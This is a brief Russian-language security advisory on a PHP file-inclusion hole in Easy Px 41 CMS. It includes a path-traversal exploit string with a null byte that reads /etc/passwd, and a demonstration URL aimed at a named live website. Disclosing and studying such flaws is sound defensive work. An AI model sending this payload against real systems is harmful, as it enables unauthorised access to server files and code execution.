PHP-инклюдинг в Easy Px 41 CMS

Программа: Easy Px 41 CMS 09.00.00B1

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных в параметре «fiche». Удаленный пользователь может выполнить
произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Эксплоит:

/[path]/?view=LivreDor&fiche=../../../../../../../../etc/passwd%00

Демонстрация:

http://www.epx41.be/?view=LivreDor&fiche=../../../../../../../../etc/passwd%00

Анатолий Ализар: Бывший автор новостной ленты «Хакера». Увлекается современными технологиями, оружием, информационной безопасностью, носимой электроникой и в целом концепцией Internet of Things.